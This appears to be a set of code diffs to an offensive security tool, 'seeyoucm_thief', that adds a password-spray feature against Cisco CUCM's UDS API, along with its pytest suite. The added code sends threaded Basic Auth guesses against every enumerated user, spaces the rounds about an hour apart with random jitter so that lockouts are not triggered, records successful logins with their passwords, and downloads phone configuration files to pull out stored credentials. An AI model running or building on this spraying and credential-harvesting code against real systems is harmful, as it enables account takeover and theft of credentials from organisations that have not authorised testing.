+            print(f'[round {round_index}/{total_rounds}] no eligible users; skipping password.')
+        else:
+            # 3b. Worker pool
+            results = {'hits': 0, 'misses': 0, 'errors': 0, 'other': 0, 'lock': threading.Lock()}
+            dead_flag = threading.Event()
+            worker_threads = []
+            for _ in range(max(1, min(threads, eligible))):
+                t = threading.Thread(
+                    target=_spray_worker,
+                    args=(work, results, password, cucm_host, port, db_file, dead_flag),
+                    daemon=True,
+                )
+                t.start()
+                worker_threads.append(t)
+            for t in worker_threads:
+                t.join()
+
+            total_attempted = results['hits'] + results['misses'] + results['errors'] + results['other']
+            print(f'[round {round_index}/{total_rounds}] hits={results["hits"]} '
+                  f'misses={results["misses"]} errors={results["errors"]} '
+                  f'other={results["other"]} (skipped {skipped})')
+
+            # 3c. Kill switch — >50% of attempts returned non-401-non-200.
+            bad = results['errors'] + results['other']
+            if total_attempted >= 4 and bad / total_attempted > 0.5:
+                print(f'[!] KILL SWITCH: {bad}/{total_attempted} attempts returned errors or '
+                      f'non-401-non-200 status. Aborting run.')
+                return
+
+        # 3d. Inter-round sleep (skip after the last password).
+        if round_index < total_rounds:
+            sleep_secs = 3600 + random.uniform(-60, 60)
+            print(f'[round {round_index}/{total_rounds}] sleeping {sleep_secs:.0f}s until next round...')
+            time.sleep(sleep_secs)
+
+
 def search_for_secrets(CUCM_host, filename, use_tftp=True):
     if debug:
         print(f'[DEBUG] Processing config file: {filename}')

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -750,6 +750,23 @@ def enumerate_devices_unauthenticated(cucm_host, port, usernames, db_file, threa
     return found_count
 
 
+def download_uds_discovered_configs(cucm_host, device_names, db_file, use_tftp=True):
+    """
+    Download and parse SEP config files for devices discovered via UDS.
+    Logs any credentials found to the DB.
+    Returns the count of configs that yielded at least one credential.
+    """
+    hits = 0
+    for device_name in device_names:
+        filename = f'{device_name}.cnf.xml'
+        creds, users = search_for_secrets(cucm_host, filename, use_tftp=use_tftp)
+        if creds or users:
+            log_credentials_to_db(cucm_host, creds, users, db_file)
+        if creds:
+            hits += 1
+    return hits
+
+
 def is_user_rate_limited(username, db_file='thief.db', hours=1):
     """
     Return True iff `username` has any spray_attempts row within the last `hours`.
@@ -2053,7 +2070,17 @@ def main():
                     CUCM_host, args.uds_port, unique_users, db_file, threads=threads,
                 )
                 if found:
-                    print(f'[+] Found devices for {found} user(s) — see --show-db for details')
+                    print(f'[+] Found devices for {found} user(s) — attempting config downloads...')
+                    conn = sqlite3.connect(db_file)
+                    device_names = [r[0] for r in conn.execute(
+                        'SELECT DISTINCT device_name FROM uds_devices WHERE cucm_host = ?',
+                        (CUCM_host,),
+                    ).fetchall()]
+                    conn.close()
+                    hits = download_uds_discovered_configs(
+                        CUCM_host, device_names, db_file, use_tftp=use_tftp,
+                    )
+                    print(f'[+] Config download complete: {hits}/{len(device_names)} configs yielded credentials')
                 else:
                     print(f'[-] No device associations returned unauthenticated')
         else:

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -1928,6 +1928,9 @@ def main():
             except FileNotFoundError:
                 print(f'[-] Password file not found: {args.passwords}')
                 quit(1)
+            except OSError as e:
+                print(f'[-] Could not read password file {args.passwords}: {e}')
+                quit(1)
             if not passwords:
                 print(f'[-] Password file is empty: {args.passwords}')
                 quit(1)

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -672,6 +672,31 @@ def log_spray_attempt(cucm_host, username, password, status_code, error, db_file
             return
 
 
+def is_user_rate_limited(username, db_file='thief.db', hours=1):
+    """
+    Return True iff `username` has any spray_attempts row within the last `hours`.
+    Per-username globally — the cucm_host column is not part of the check.
+    """
+    try:
+        modifier = f'-{int(hours)} hours'
+        conn = sqlite3.connect(db_file, timeout=30.0)
+        cursor = conn.cursor()
+        cursor.execute('''
+            SELECT 1 FROM spray_attempts
+             WHERE username = ?
+               AND attempt_time > datetime('now', 'localtime', ?)
+             LIMIT 1
+        ''', (username, modifier))
+        row = cursor.fetchone()
+        conn.close()
+        return row is not None
+    except Exception as e:
+        if globals().get('debug', False):
+            print(f'[!] is_user_rate_limited error: {e}')
+        # Fail closed: if we can't check, assume limited (don't spray).
+        return True
+
+
 def search_for_secrets(CUCM_host, filename, use_tftp=True):
     if debug:
         print(f'[DEBUG] Processing config file: {filename}')

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -736,6 +736,46 @@ def _load_password_list(path):
         return [line.strip() for line in f if line.strip()]
 
 
+def _spray_worker(work_queue, results, password, cucm_host, port, db_file, dead_flag, timeout=10):
+    """
+    Thread target. Pops usernames off work_queue and attempts Basic Auth GET
+    against /cucm-uds/user/{username}. Logs every attempt to spray_attempts.
+
+    results: dict with int keys 'hits'/'misses'/'errors'/'other' and 'lock'.
+    dead_flag: threading.Event set by the orchestrator to abort a runaway round.
+    """
+    while not dead_flag.is_set():
+        try:
+            username = work_queue.get_nowait()
+        except queue.Empty:
+            return
+
+        url = f'https://{cucm_host}:{port}/cucm-uds/user/{username}'
+        status_code = None
+        error = None
+        try:
+            resp = requests.get(url, auth=(username, password), verify=False, timeout=timeout)
+            status_code = resp.status_code
+        except requests.exceptions.Timeout as e:
+            error = f'timeout: {e}'
+        except requests.exceptions.ConnectionError as e:
+            error = f'connection: {e}'
+        except Exception as e:
+            error = f'{type(e).__name__}: {e}'
+
+        log_spray_attempt(cucm_host, username, password, status_code, error, db_file)
+
+        with results['lock']:
+            if status_code == 200:
+                results['hits'] += 1
+            elif status_code == 401:
+                results['misses'] += 1
+            elif status_code is None:
+                results['errors'] += 1
+            else:
+                results['other'] += 1
+
+
 def search_for_secrets(CUCM_host, filename, use_tftp=True):
     if debug:
         print(f'[DEBUG] Processing config file: {filename}')

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -104,3 +104,43 @@ def test_record_uds_users_host_scoped(db_path):
     ).fetchone()[0]
     conn.close()
     assert count == 2  # one row per host
+
+
+def test_log_spray_attempt_writes_row(db_path):
+    thief.log_spray_attempt(
+        "cucm-a.example.com", "alice", "Summer2025!", 200, None, db_path
+    )
+    conn = sqlite3.connect(db_path)
+    row = conn.execute(
+        "SELECT cucm_host, username, password, status_code, error "
+        "FROM spray_attempts WHERE username='alice'"
+    ).fetchone()
+    conn.close()
+    assert row == ("cucm-a.example.com", "alice", "Summer2025!", 200, None)
+
+
+def test_log_spray_attempt_records_error_with_null_status(db_path):
+    thief.log_spray_attempt(
+        "cucm-a.example.com", "bob", "Winter2025!", None, "timeout: read timed out", db_path
+    )
+    conn = sqlite3.connect(db_path)
+    row = conn.execute(
+        "SELECT status_code, error FROM spray_attempts WHERE username='bob'"
+    ).fetchone()
+    conn.close()
+    assert row[0] is None
+    assert row[1] == "timeout: read timed out"
+
+
+def test_log_spray_attempt_appends_history(db_path):
+    """No UNIQUE constraint — each call adds a new row, preserving history."""
+    for status in (401, 401, 200):
+        thief.log_spray_attempt(
+            "cucm-a.example.com", "alice", "p", status, None, db_path
+        )
+    conn = sqlite3.connect(db_path)
+    count = conn.execute(
+        "SELECT COUNT(*) FROM spray_attempts WHERE username='alice'"
+    ).fetchone()[0]
+    conn.close()
+    assert count == 3

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -216,3 +216,24 @@ def test_oracle_check_returns_unknown_on_network_error():
     with patch.object(thief.requests, 'get', side_effect=requests.exceptions.ConnectTimeout("boom")):
         result = thief._spray_oracle_check("cucm-a.example.com", 8443, "alice")
     assert result == 'unknown'
+
+
+def test_load_password_list_strips_and_skips_blanks(tmp_path):
+    pw_file = tmp_path / "passwords.txt"
+    pw_file.write_text("Summer2025!\n  Winter2024\n\n\t\nPassword1\n")
+    pws = thief._load_password_list(str(pw_file))
+    assert pws == ["Summer2025!", "Winter2024", "Password1"]
+
+
+def test_load_password_list_preserves_order_and_duplicates(tmp_path):
+    pw_file = tmp_path / "passwords.txt"
+    pw_file.write_text("a\nb\na\n")
+    pws = thief._load_password_list(str(pw_file))
+    # Order matters (rounds run in file order); duplicates pass through —
+    # if the operator listed it twice, that's their call.
+    assert pws == ["a", "b", "a"]
+
+
+def test_load_password_list_missing_file_raises(tmp_path):
+    with pytest.raises(FileNotFoundError):
+        thief._load_password_list(str(tmp_path / "does-not-exist.txt"))

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -584,6 +584,21 @@ def test_show_db_prints_spray_hits(db_path, capsys):
     assert "bob" not in out  # misses are not shown in the hits section
 
 
+def test_cli_directory_as_password_file_errors_cleanly(monkeypatch, tmp_path, capsys):
+    """Passing a directory to -P should print a clean error, not a traceback."""
+    db = tmp_path / "thief.db"
+    target_dir = tmp_path / "not-a-file"
+    target_dir.mkdir()
+    monkeypatch.setattr('sys.argv', [
+        'thief', '-H', '1.2.3.4', '--spray', '-P', str(target_dir),
+        '--db', str(db),
+    ])
+    with pytest.raises(SystemExit):
+        thief.main()
+    out = capsys.readouterr().out
+    assert 'Could not read password file' in out or 'Password file not found' in out
+
+
 def test_spray_worker_urlencodes_username(db_path):
     """A username with special chars must not alter the URL path."""
     work = queue_mod.Queue()

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -314,3 +314,155 @@ def test_spray_worker_short_circuits_on_dead_flag(db_path):
             dead_flag=dead_flag,
         )
     assert mock_get.call_count == 0  # never made any HTTP calls
+
+
+def _patch_get_users(monkeypatch, users):
+    """Bypass the real /cucm-uds/users HTTP call by patching get_users_api."""
+    monkeypatch.setattr(thief, 'get_users_api', lambda *a, **kw: list(users))
+
+
+def _patch_oracle(monkeypatch, result='ok'):
+    monkeypatch.setattr(thief, '_spray_oracle_check', lambda *a, **kw: result)
+
+
+def test_run_spray_end_to_end_single_password(monkeypatch, db_path):
+    _patch_get_users(monkeypatch, ["alice", "bob", "carol"])
+    _patch_oracle(monkeypatch, 'ok')
+
+    def fake_get(url, **kwargs):
+        # /cucm-uds/user/<userid>
+        userid = url.rsplit('/', 1)[-1]
+        status = 200 if userid == 'bob' else 401
+        return MagicMock(status_code=status, text="")
+
+    with patch.object(thief.requests, 'get', side_effect=fake_get):
+        thief.run_spray(
+            cucm_host="cucm-a.example.com", port=8443,
+            passwords=["Summer2025!"], threads=2,
+            rate_limit_hours=1, probe=True, db_file=db_path,
+        )
+
+    conn = sqlite3.connect(db_path)
+    rows = conn.execute(
+        "SELECT username, status_code FROM spray_attempts ORDER BY username"
+    ).fetchall()
+    conn.close()
+    assert ("alice", 401) in rows
+    assert ("bob", 200) in rows
+    assert ("carol", 401) in rows
+    assert len(rows) == 3
+
+
+def test_run_spray_aborts_on_oracle_bypass(monkeypatch, db_path):
+    _patch_get_users(monkeypatch, ["alice", "bob"])
+    _patch_oracle(monkeypatch, 'bypass')
+    with patch.object(thief.requests, 'get') as mock_get:
+        thief.run_spray(
+            cucm_host="cucm-a.example.com", port=8443,
+            passwords=["Summer2025!"], threads=2,
+            rate_limit_hours=1, probe=True, db_file=db_path,
+        )
+    conn = sqlite3.connect(db_path)
+    count = conn.execute("SELECT COUNT(*) FROM spray_attempts").fetchone()[0]
+    conn.close()
+    assert count == 0
+    assert mock_get.call_count == 0  # never made a real spray request
+
+
+def test_run_spray_skips_rate_limited_users(monkeypatch, db_path):
+    _patch_get_users(monkeypatch, ["alice", "bob", "carol"])
+    _patch_oracle(monkeypatch, 'ok')
+    _insert_attempt_at(db_path, "alice", minutes_ago=30)  # alice is already limited
+
+    requested_users = []
+
+    def fake_get(url, **kwargs):
+        userid = url.rsplit('/', 1)[-1]
+        requested_users.append(userid)
+        return MagicMock(status_code=401, text="")
+
+    with patch.object(thief.requests, 'get', side_effect=fake_get):
+        thief.run_spray(
+            cucm_host="cucm-a.example.com", port=8443,
+            passwords=["Summer2025!"], threads=2,
+            rate_limit_hours=1, probe=True, db_file=db_path,
+        )
+
+    assert "alice" not in requested_users
+    assert set(requested_users) == {"bob", "carol"}
+
+
+def test_run_spray_kill_switch_on_majority_403(monkeypatch, db_path):
+    users = [f"u{i}" for i in range(10)]
+    _patch_get_users(monkeypatch, users)
+    _patch_oracle(monkeypatch, 'ok')
+
+    def fake_get(url, **kwargs):
+        userid = url.rsplit('/', 1)[-1]
+        idx = int(userid[1:])
+        status = 403 if idx < 6 else 401  # 6/10 return 403
+        return MagicMock(status_code=status, text="")
+
+    with patch.object(thief.requests, 'get', side_effect=fake_get):
+        thief.run_spray(
+            cucm_host="cucm-a.example.com", port=8443,
+            # two passwords — kill switch should stop us before round 2
+            passwords=["p1", "p2"], threads=10,
+            rate_limit_hours=1, probe=True, db_file=db_path,
+        )
+
+    conn = sqlite3.connect(db_path)
+    # Only password 'p1' should appear; round 2 must be aborted before any 'p2' rows are written.
+    pw_set = {row[0] for row in conn.execute("SELECT DISTINCT password FROM spray_attempts").fetchall()}
+    conn.close()
+    assert pw_set == {"p1"}
+
+
+def test_run_spray_records_users_in_uds_users(monkeypatch, db_path):
+    _patch_get_users(monkeypatch, ["alice", "bob"])
+    _patch_oracle(monkeypatch, 'ok')
+    with patch.object(thief.requests, 'get', return_value=MagicMock(status_code=401, text="")):
+        thief.run_spray(
+            cucm_host="cucm-a.example.com", port=8443,
+            passwords=["p"], threads=1,
+            rate_limit_hours=1, probe=True, db_file=db_path,
+        )
+    conn = sqlite3.connect(db_path)
+    rows = conn.execute("SELECT username FROM uds_users ORDER BY username").fetchall()
+    conn.close()
+    assert rows == [("alice",), ("bob",)]
+
+
+def test_run_spray_sleeps_between_password_rounds(monkeypatch, db_path):
+    _patch_get_users(monkeypatch, ["alice"])
+    _patch_oracle(monkeypatch, 'ok')
+    sleeps = []
+    monkeypatch.setattr(thief.time, 'sleep', lambda s: sleeps.append(s))
+    with patch.object(thief.requests, 'get', return_value=MagicMock(status_code=401, text="")):
+        thief.run_spray(
+            cucm_host="cucm-a.example.com", port=8443,
+            passwords=["p1", "p2"], threads=1,
+            rate_limit_hours=1, probe=True, db_file=db_path,
+        )
+    # Exactly one inter-round sleep, within 3600 ± 60 seconds.
+    inter_round = [s for s in sleeps if s > 100]  # filter out worker-internal sleeps if any
+    assert len(inter_round) == 1
+    assert 3540 <= inter_round[0] <= 3660
+
+
+def test_run_spray_skips_probe_when_disabled(monkeypatch, db_path):
+    _patch_get_users(monkeypatch, ["alice"])
+    probe_called = {"n": 0}
+
+    def fake_probe(*a, **kw):
+        probe_called["n"] += 1
+        return 'ok'
+
+    monkeypatch.setattr(thief, '_spray_oracle_check', fake_probe)
+    with patch.object(thief.requests, 'get', return_value=MagicMock(status_code=401, text="")):
+        thief.run_spray(
+            cucm_host="cucm-a.example.com", port=8443,
+            passwords=["p"], threads=1,
+            rate_limit_hours=1, probe=False, db_file=db_path,
+        )
+    assert probe_called["n"] == 0

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -570,3 +570,23 @@ def test_cli_no_spray_probe_passes_probe_false(monkeypatch, tmp_path):
     with pytest.raises(SystemExit):
         thief.main()
     assert called['probe'] is False
+
+
+def test_show_db_prints_spray_hits(db_path, capsys):
+    # Seed one hit and one miss
+    thief.log_spray_attempt("cucm-a.example.com", "alice", "Summer2025!", 200, None, db_path)
+    thief.log_spray_attempt("cucm-a.example.com", "bob", "Summer2025!", 401, None, db_path)
+    thief.display_database_summary(db_path)
+    out = capsys.readouterr().out
+    assert "UDS Spray Hits" in out
+    assert "alice" in out
+    assert "Summer2025!" in out
+    assert "bob" not in out  # misses are not shown in the hits section
+
+
+def test_show_db_omits_spray_section_when_no_hits(db_path, capsys):
+    # Seed only a miss; no 200s.
+    thief.log_spray_attempt("cucm-a.example.com", "bob", "Winter", 401, None, db_path)
+    thief.display_database_summary(db_path)
+    out = capsys.readouterr().out
+    assert "UDS Spray Hits" not in out

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -237,3 +237,82 @@ def test_load_password_list_preserves_order_and_duplicates(tmp_path):
 def test_load_password_list_missing_file_raises(tmp_path):
     with pytest.raises(FileNotFoundError):
         thief._load_password_list(str(tmp_path / "does-not-exist.txt"))
+
+
+import queue as queue_mod
+import threading
+
+
+def test_spray_worker_logs_hit_on_200(db_path):
+    work = queue_mod.Queue()
+    work.put("alice")
+    results = {"hits": 0, "misses": 0, "errors": 0, "other": 0, "lock": threading.Lock()}
+    dead_flag = threading.Event()
+    fake_resp = MagicMock(status_code=200, text="<user/>")
+    with patch.object(thief.requests, 'get', return_value=fake_resp):
+        thief._spray_worker(
+            work_queue=work,
+            results=results,
+            password="Summer2025!",
+            cucm_host="cucm-a.example.com",
+            port=8443,
+            db_file=db_path,
+            dead_flag=dead_flag,
+        )
+    assert results["hits"] == 1
+    conn = sqlite3.connect(db_path)
+    row = conn.execute(
+        "SELECT status_code, password FROM spray_attempts WHERE username='alice'"
+    ).fetchone()
+    conn.close()
+    assert row == (200, "Summer2025!")
+
+
+def test_spray_worker_logs_miss_on_401(db_path):
+    work = queue_mod.Queue()
+    work.put("bob")
+    results = {"hits": 0, "misses": 0, "errors": 0, "other": 0, "lock": threading.Lock()}
+    fake_resp = MagicMock(status_code=401, text="")
+    with patch.object(thief.requests, 'get', return_value=fake_resp):
+        thief._spray_worker(
+            work_queue=work, results=results, password="bad",
+            cucm_host="cucm-a.example.com", port=8443, db_file=db_path,
+            dead_flag=threading.Event(),
+        )
+    assert results["misses"] == 1
+
+
+def test_spray_worker_logs_error_on_timeout(db_path):
+    work = queue_mod.Queue()
+    work.put("carol")
+    results = {"hits": 0, "misses": 0, "errors": 0, "other": 0, "lock": threading.Lock()}
+    with patch.object(thief.requests, 'get', side_effect=requests.exceptions.ConnectTimeout("boom")):
+        thief._spray_worker(
+            work_queue=work, results=results, password="p",
+            cucm_host="cucm-a.example.com", port=8443, db_file=db_path,
+            dead_flag=threading.Event(),
+        )
+    assert results["errors"] == 1
+    conn = sqlite3.connect(db_path)
+    row = conn.execute(
+        "SELECT status_code, error FROM spray_attempts WHERE username='carol'"
+    ).fetchone()
+    conn.close()
+    assert row[0] is None
+    assert row[1].startswith("timeout:")
+
+
+def test_spray_worker_short_circuits_on_dead_flag(db_path):
+    work = queue_mod.Queue()
+    work.put("alice")
+    work.put("bob")
+    results = {"hits": 0, "misses": 0, "errors": 0, "other": 0, "lock": threading.Lock()}
+    dead_flag = threading.Event()
+    dead_flag.set()
+    with patch.object(thief.requests, 'get') as mock_get:
+        thief._spray_worker(
+            work_queue=work, results=results, password="p",
+            cucm_host="cucm-a.example.com", port=8443, db_file=db_path,
+            dead_flag=dead_flag,
+        )
+    assert mock_get.call_count == 0  # never made any HTTP calls

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -144,3 +144,43 @@ def test_log_spray_attempt_appends_history(db_path):
     ).fetchone()[0]
     conn.close()
     assert count == 3
+
+
+def _insert_attempt_at(db_path, username, minutes_ago, status_code=401, cucm_host="cucm-a.example.com"):
+    ts = (datetime.now() - timedelta(minutes=minutes_ago)).strftime('%Y-%m-%d %H:%M:%S')
+    conn = sqlite3.connect(db_path)
+    conn.execute(
+        "INSERT INTO spray_attempts "
+        "(cucm_host, username, password, status_code, error, attempt_time) "
+        "VALUES (?, ?, ?, ?, ?, ?)",
+        (cucm_host, username, "p", status_code, None, ts),
+    )
+    conn.commit()
+    conn.close()
+
+
+def test_is_user_rate_limited_recent_attempt(db_path):
+    _insert_attempt_at(db_path, "alice", minutes_ago=30)
+    assert thief.is_user_rate_limited("alice", db_path, hours=1) is True
+
+
+def test_is_user_rate_limited_expired_window(db_path):
+    _insert_attempt_at(db_path, "alice", minutes_ago=120)
+    assert thief.is_user_rate_limited("alice", db_path, hours=1) is False
+
+
+def test_is_user_rate_limited_no_history(db_path):
+    assert thief.is_user_rate_limited("never-tried", db_path, hours=1) is False
+
+
+def test_is_user_rate_limited_is_global_across_hosts(db_path):
+    """Per design: rate limit is per-username globally, not per (host, username)."""
+    _insert_attempt_at(db_path, "alice", minutes_ago=30, cucm_host="cucm-a.example.com")
+    # Even though we're 'asking' about a different host, alice is still limited.
+    assert thief.is_user_rate_limited("alice", db_path, hours=1) is True
+
+
+def test_is_user_rate_limited_respects_custom_window(db_path):
+    _insert_attempt_at(db_path, "alice", minutes_ago=90)  # 1.5h ago
+    assert thief.is_user_rate_limited("alice", db_path, hours=1) is False
+    assert thief.is_user_rate_limited("alice", db_path, hours=2) is True

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -584,6 +584,28 @@ def test_show_db_prints_spray_hits(db_path, capsys):
     assert "bob" not in out  # misses are not shown in the hits section
 
 
+def test_spray_worker_urlencodes_username(db_path):
+    """A username with special chars must not alter the URL path."""
+    work = queue_mod.Queue()
+    work.put("weird/name?x")
+    results = {"hits": 0, "misses": 0, "errors": 0, "other": 0, "lock": threading.Lock()}
+    captured_url = {}
+
+    def fake_get(url, **kwargs):
+        captured_url['url'] = url
+        return MagicMock(status_code=401, text="")
+
+    with patch.object(thief.requests, 'get', side_effect=fake_get):
+        thief._spray_worker(
+            work_queue=work, results=results, password="p",
+            cucm_host="cucm-a.example.com", port=8443, db_file=db_path,
+            dead_flag=threading.Event(),
+        )
+    assert captured_url['url'] == (
+        'https://cucm-a.example.com:8443/cucm-uds/user/weird%2Fname%3Fx'
+    )
+
+
 def test_show_db_omits_spray_section_when_no_hits(db_path, capsys):
     # Seed only a miss; no 200s.
     thief.log_spray_attempt("cucm-a.example.com", "bob", "Winter", 401, None, db_path)

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -535,6 +535,7 @@ def test_cli_invokes_run_spray_with_correct_args(monkeypatch, tmp_path):
     assert called['rate_limit_hours'] == 2
     assert called['probe'] is True
     assert called['db_file'] == str(db)
+    assert called['port'] == 8443  # default --uds-port
 
 
 def test_cli_password_file_is_loaded(monkeypatch, tmp_path):

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -184,3 +184,35 @@ def test_is_user_rate_limited_respects_custom_window(db_path):
     _insert_attempt_at(db_path, "alice", minutes_ago=90)  # 1.5h ago
     assert thief.is_user_rate_limited("alice", db_path, hours=1) is False
     assert thief.is_user_rate_limited("alice", db_path, hours=2) is True
+
+
+def test_oracle_check_returns_ok_on_401():
+    fake_resp = MagicMock(status_code=401, text="")
+    with patch.object(thief.requests, 'get', return_value=fake_resp) as mock_get:
+        result = thief._spray_oracle_check("cucm-a.example.com", 8443, "alice")
+    assert result == 'ok'
+    # The probe should have called the per-user endpoint with Basic Auth
+    call_kwargs = mock_get.call_args.kwargs
+    assert 'auth' in call_kwargs
+    assert call_kwargs['auth'][0] == 'alice'
+    assert call_kwargs['auth'][1].startswith('spray-probe-')
+
+
+def test_oracle_check_returns_bypass_on_200():
+    fake_resp = MagicMock(status_code=200, text="<user/>")
+    with patch.object(thief.requests, 'get', return_value=fake_resp):
+        result = thief._spray_oracle_check("cucm-a.example.com", 8443, "alice")
+    assert result == 'bypass'
+
+
+def test_oracle_check_returns_unknown_on_403():
+    fake_resp = MagicMock(status_code=403, text="")
+    with patch.object(thief.requests, 'get', return_value=fake_resp):
+        result = thief._spray_oracle_check("cucm-a.example.com", 8443, "alice")
+    assert result == 'unknown'
+
+
+def test_oracle_check_returns_unknown_on_network_error():
+    with patch.object(thief.requests, 'get', side_effect=requests.exceptions.ConnectTimeout("boom")):
+        result = thief._spray_oracle_check("cucm-a.example.com", 8443, "alice")
+    assert result == 'unknown'

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -1,0 +1,63 @@
+"""Tests for the UDS password-spray feature."""
+import os
+import sqlite3
+import time
+from datetime import datetime, timedelta
+from unittest.mock import MagicMock, patch
+
+import pytest
+import requests
+
+from seeyoucm_thief import thief
+
+
+@pytest.fixture(autouse=True)
+def _disable_test_mode(monkeypatch):
+    """Ensure _TEST_MODE is False so the real code paths execute."""
+    monkeypatch.setattr(thief, '_TEST_MODE', False)
+
+
+@pytest.fixture
+def db_path(tmp_path):
+    """Return a path to a freshly-initialized thief.db in tmp_path."""
+    p = tmp_path / "thief.db"
+    thief.init_database(str(p))
+    return str(p)
+
+
+def _table_columns(db_path, table):
+    conn = sqlite3.connect(db_path)
+    try:
+        rows = conn.execute(f"PRAGMA table_info({table})").fetchall()
+    finally:
+        conn.close()
+    return {row[1] for row in rows}  # column name is index 1
+
+
+def _index_exists(db_path, index_name):
+    conn = sqlite3.connect(db_path)
+    try:
+        row = conn.execute(
+            "SELECT name FROM sqlite_master WHERE type='index' AND name=?",
+            (index_name,),
+        ).fetchone()
+    finally:
+        conn.close()
+    return row is not None
+
+
+def test_init_database_creates_uds_users_table(db_path):
+    cols = _table_columns(db_path, "uds_users")
+    assert {"id", "cucm_host", "username", "first_seen", "last_seen"} <= cols
+
+
+def test_init_database_creates_spray_attempts_table(db_path):
+    cols = _table_columns(db_path, "spray_attempts")
+    assert {
+        "id", "cucm_host", "username", "password",
+        "status_code", "error", "attempt_time",
+    } <= cols
+
+
+def test_init_database_creates_spray_attempts_index(db_path):
+    assert _index_exists(db_path, "idx_spray_attempts_user_time")

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -1,6 +1,8 @@
 """Tests for the UDS password-spray feature."""
 import os
+import queue as queue_mod
 import sqlite3
+import threading
 import time
 from datetime import datetime, timedelta
 from unittest.mock import MagicMock, patch
@@ -237,10 +239,6 @@ def test_load_password_list_preserves_order_and_duplicates(tmp_path):
 def test_load_password_list_missing_file_raises(tmp_path):
     with pytest.raises(FileNotFoundError):
         thief._load_password_list(str(tmp_path / "does-not-exist.txt"))
-
-
-import queue as queue_mod
-import threading
 
 
 def test_spray_worker_logs_hit_on_200(db_path):

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -482,3 +482,90 @@ def test_run_spray_skips_probe_when_disabled(monkeypatch, db_path):
             rate_limit_hours=1, probe=False, db_file=db_path,
         )
     assert probe_called["n"] == 0
+
+
+def test_cli_requires_password_when_spray(monkeypatch, capsys):
+    monkeypatch.setattr('sys.argv', ['thief', '-H', '1.2.3.4', '--spray'])
+    with pytest.raises(SystemExit):
+        thief.main()
+    captured = capsys.readouterr()
+    assert '--spray-password' in captured.err or '--spray-password' in captured.out
+
+
+def test_cli_rejects_both_password_and_passwords_file(monkeypatch, tmp_path, capsys):
+    pw = tmp_path / "p.txt"
+    pw.write_text("x\n")
+    monkeypatch.setattr('sys.argv', [
+        'thief', '-H', '1.2.3.4', '--spray',
+        '--spray-password', 'a', '-P', str(pw),
+    ])
+    with pytest.raises(SystemExit):
+        thief.main()
+
+
+def test_cli_rejects_spray_with_brute_mac(monkeypatch, capsys):
+    monkeypatch.setattr('sys.argv', [
+        'thief', '-H', '1.2.3.4', '--spray', '--spray-password', 'a', '--brute-mac',
+    ])
+    with pytest.raises(SystemExit):
+        thief.main()
+
+
+def test_cli_invokes_run_spray_with_correct_args(monkeypatch, tmp_path):
+    called = {}
+
+    def fake_run_spray(**kwargs):
+        called.update(kwargs)
+
+    monkeypatch.setattr(thief, 'run_spray', fake_run_spray)
+    monkeypatch.setattr(thief, 'get_version', lambda *a, **kw: {'version': '15.0', 'prefix': None})
+    db = tmp_path / "thief.db"
+    monkeypatch.setattr('sys.argv', [
+        'thief', '-H', '1.2.3.4', '--spray',
+        '--spray-password', 'Summer2025!',
+        '--spray-threads', '5',
+        '--spray-rate-limit-hours', '2',
+        '--db', str(db),
+    ])
+    with pytest.raises(SystemExit):
+        thief.main()
+    assert called['cucm_host'] == '1.2.3.4'
+    assert called['passwords'] == ['Summer2025!']
+    assert called['threads'] == 5
+    assert called['rate_limit_hours'] == 2
+    assert called['probe'] is True
+    assert called['db_file'] == str(db)
+
+
+def test_cli_password_file_is_loaded(monkeypatch, tmp_path):
+    pw_file = tmp_path / "passwords.txt"
+    pw_file.write_text("p1\np2\np3\n")
+    called = {}
+
+    def fake_run_spray(**kwargs):
+        called.update(kwargs)
+
+    monkeypatch.setattr(thief, 'run_spray', fake_run_spray)
+    monkeypatch.setattr(thief, 'get_version', lambda *a, **kw: {'version': '15.0', 'prefix': None})
+    db = tmp_path / "thief.db"
+    monkeypatch.setattr('sys.argv', [
+        'thief', '-H', '1.2.3.4', '--spray', '-P', str(pw_file),
+        '--db', str(db),
+    ])
+    with pytest.raises(SystemExit):
+        thief.main()
+    assert called['passwords'] == ['p1', 'p2', 'p3']
+
+
+def test_cli_no_spray_probe_passes_probe_false(monkeypatch, tmp_path):
+    called = {}
+    monkeypatch.setattr(thief, 'run_spray', lambda **kw: called.update(kw))
+    monkeypatch.setattr(thief, 'get_version', lambda *a, **kw: None)
+    db = tmp_path / "thief.db"
+    monkeypatch.setattr('sys.argv', [
+        'thief', '-H', '1.2.3.4', '--spray', '--spray-password', 'p',
+        '--no-spray-probe', '--db', str(db),
+    ])
+    with pytest.raises(SystemExit):
+        thief.main()
+    assert called['probe'] is False

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -369,6 +369,22 @@ def test_run_spray_aborts_on_oracle_bypass(monkeypatch, db_path):
     assert mock_get.call_count == 0  # never made a real spray request
 
 
+def test_run_spray_aborts_on_oracle_unknown(monkeypatch, db_path):
+    _patch_get_users(monkeypatch, ["alice", "bob"])
+    _patch_oracle(monkeypatch, 'unknown')
+    with patch.object(thief.requests, 'get') as mock_get:
+        thief.run_spray(
+            cucm_host="cucm-a.example.com", port=8443,
+            passwords=["Summer2025!"], threads=2,
+            rate_limit_hours=1, probe=True, db_file=db_path,
+        )
+    conn = sqlite3.connect(db_path)
+    count = conn.execute("SELECT COUNT(*) FROM spray_attempts").fetchone()[0]
+    conn.close()
+    assert count == 0
+    assert mock_get.call_count == 0
+
+
 def test_run_spray_skips_rate_limited_users(monkeypatch, db_path):
     _patch_get_users(monkeypatch, ["alice", "bob", "carol"])
